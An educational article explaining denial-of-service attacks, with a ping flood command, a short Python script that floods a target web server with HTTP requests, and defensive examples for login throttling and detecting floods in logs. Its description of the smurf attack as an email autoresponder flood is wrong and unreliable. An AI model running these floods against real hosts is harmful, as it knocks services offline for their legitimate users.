Denial of Service and Prevention

Denial of Service (DoS) is a cyber-attack on an individual computer or website with the intent to deny service to its intended users. Its purpose is to disrupt an organization’s network operations by denying access to its users. Denial of service is typically accomplished by flooding the targeted machine or resource with surplus requests in an attempt to overload systems and prevent some or all legitimate requests from being fulfilled.
For example, if a bank website can handle 10 people a second clicking the Login button, an attacker only has to send 10 fake requests per second to make it so no legitimate users can log in.

DoS attacks exploit various weaknesses in computer network technologies. They may target servers, network routers, or network communication links. They can cause computers and routers to crash and links to bog down.

The most famous DoS technique is Ping of Death. The Ping of Death attack works by generating and sending special network messages (specifically, ICMP packets of non-standard sizes) that cause problems for systems that receive them. In the early days of the Web, this attack could cause unprotected Internet servers to crash quickly.

It is strongly recommended to try all of the described activity on virtual machines rather than in your working environment.

The following command floods an IP address with requests:

ping ip_address -t -l 65500

Here,

  • “ping” sends the data packets to the victim.
  • “ip_address” is the IP address of the victim.
  • “-t” means the data packets should be sent until the program is stopped.
  • “-l 65500” specifies the data load to be sent to the victim.

Other basic types of DoS attacks involve:

  • Flooding a network with useless activity so that genuine traffic cannot get through. The TCP/IP SYN and smurf attacks are two common examples.
  • Remotely overloading a system’s CPU so that valid requests cannot be processed.
  • Changing permissions or breaking authorization logic to prevent users from logging into a system. One common example involves triggering a rapid series of false login attempts that lock out accounts from being able to log in.
  • Deleting or interfering with specific critical applications or services to prevent their normal operation (even if the system and network overall are functional).
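The lockout problem in the third item can be avoided on the defending side by delaying repeated failures per account and source instead of locking the account. The sketch below is an added example, not code from the original article; the `LoginThrottle` class, its parameters and the addresses are constructed for illustration.

```python
class LoginThrottle:
    """Per-(account, source) exponential backoff instead of a hard account lock."""

    def __init__(self, free_attempts=3, base_delay=2.0, max_delay=300.0):
        self.free_attempts = free_attempts
        self.base_delay = base_delay
        self.max_delay = max_delay
        self._failures = {}   # (account, source) -> (failure_count, time_of_last_failure)

    def retry_after(self, account, source, now):
        """Seconds this source must still wait before trying this account (0 = go ahead)."""
        count, last = self._failures.get((account, source), (0, 0.0))
        if count < self.free_attempts:
            return 0.0
        delay = min(self.base_delay * 2 ** (count - self.free_attempts), self.max_delay)
        return max(0.0, last + delay - now)

    def attempt(self, account, source, password_ok, now):
        """Return 'throttled', 'ok' or 'denied'. Throttled attempts are rejected
        before the password is checked and do not extend the delay."""
        if self.retry_after(account, source, now) > 0:
            return "throttled"
        key = (account, source)
        if password_ok:
            self._failures.pop(key, None)   # a successful login clears the history
            return "ok"
        count, _ = self._failures.get(key, (0, 0.0))
        self._failures[key] = (count + 1, now)
        return "denied"


def simulate():
    """Constructed scenario: one source guesses alice's password once a second
    for 20 seconds, then alice logs in from a different source."""
    throttle = LoginThrottle()
    flood = [throttle.attempt("alice", "198.51.100.7", False, float(t)) for t in range(20)]
    owner = throttle.attempt("alice", "203.0.113.5", True, 20.0)
    return flood, owner


if __name__ == "__main__":
    flood, owner = simulate()
    print(flood.count("denied"), "checked,", flood.count("throttled"), "throttled; owner:", owner)
```

Because the delay is keyed on the source as well as the account, guesses spread over many sources need a separate per-account control such as a challenge step.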

Another variant of the DoS is the Smurf attack. This involves emails with automatic responses. If someone sends hundreds of email messages with a fake return email address to hundreds of people in an organization who have an autoresponder turned on in their email, the initial sent messages can become thousands sent to the fake email address. If that fake email address actually belongs to someone, this can overwhelm that person’s account.

DoS attacks can cause the following problems:

  • Ineffective services
  • Inaccessible services
  • Interruption of network traffic
  • Connection interference

The following Python script performs a denial of service attack against a small website that does not expect so many socket connections:

# Please note that running this code might
# cause your IP blocked by server. And purpose
# of this code is only learning.
import socket, sys, os  
print "][ Attacking " + sys.argv[1]  + " ... ]["  
print "injecting " + sys.argv[2];  
def attack():  
    #pid = os.fork()  
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
    s.connect((sys.argv[1], 80))  
    print ">> GET /" + sys.argv[2] + " HTTP/1.1"  
    s.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")  
    s.send("Host: " + sys.argv[1]  + "\r\n\r\n");  
    s.close()  

# Driver code
for i in range(1, 1000):  
    attack() 

We can use the above code as follows:

python ddos.py target_ip_address apache

Prevention

Given that Denial of Service (DoS) attacks are becoming more frequent, it is a good time to review the basics and how we can fight back.

  • Cloud Mitigation Provider – Cloud mitigation providers are experts at providing DDoS mitigation from the cloud. This means they have built out massive amounts of network bandwidth and DDoS mitigation capacity at multiple sites around the Internet that can take in any type of network traffic, whether you use multiple ISPs, your own data center or any number of cloud providers. They can scrub the traffic for you and only send “clean” traffic to your data center.
  • Firewall – This is the simplest and least effective method. Generally, someone writes some Python scripts that try to filter out the bad traffic, or an enterprise will try to use its existing firewalls to block the traffic.
  • Internet Service Provider (ISP) – Some enterprises use their ISP to provide DDoS mitigation. These ISPs have more bandwidth than an enterprise would, which can help with large volumetric attacks.
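The Firewall item mentions Python scripts that try to pick out bad traffic. The following is an added example of that idea, not code from the original article: it scans web server access log lines in Common Log Format and reports clients that exceed a request budget inside a sliding time window. The thresholds, function names and sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "')
CLF_TIME = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return (client_ip, timestamp) for a Common Log Format line, or None."""
    m = CLF_RE.match(line)
    if m is None:
        return None
    try:
        return m.group(1), datetime.strptime(m.group(2), CLF_TIME)
    except ValueError:
        return None

def find_flooders(lines, max_requests=50, window_seconds=10):
    """Map each client that exceeded max_requests inside one sliding window
    to its peak in-window request count. Lines must be in time order."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # client_ip -> timestamps still inside the window
    peaks = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue              # skip malformed lines instead of stopping the scan
        ip, ts = parsed
        q = recent[ip]
        q.append(ts)
        while ts - q[0] >= window:
            q.popleft()           # drop requests that have aged out of the window
        if len(q) > max_requests:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

def make_sample_log():
    """Constructed sample: one client sends 80 requests in two seconds,
    another sends one request every three seconds."""
    t0 = datetime(2024, 1, 1, 12, 0, 0, tzinfo=timezone.utc)
    events = [(t0 + timedelta(seconds=i // 40), "198.51.100.7") for i in range(80)]
    events += [(t0 + timedelta(seconds=3 * i), "203.0.113.5") for i in range(5)]
    events.sort()
    lines = [f'{ip} - - [{ts.strftime(CLF_TIME)}] "GET /apache HTTP/1.1" 200 512'
             for ts, ip in events]
    lines.insert(10, "garbled line with no timestamp")
    return lines

if __name__ == "__main__":
    print(find_flooders(make_sample_log()))
```

The addresses it reports can be passed to whatever blocking or rate-limiting mechanism sits in front of the server. A single-source detector like this does not help when the requests are spread across many clients.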

To safeguard against these attacks, you have to apply secure coding and design a strong architecture that can prevent these kinds of attacks, and keep your website updated day to day with fixes for its bugs.

This article is contributed by Akash Sharan.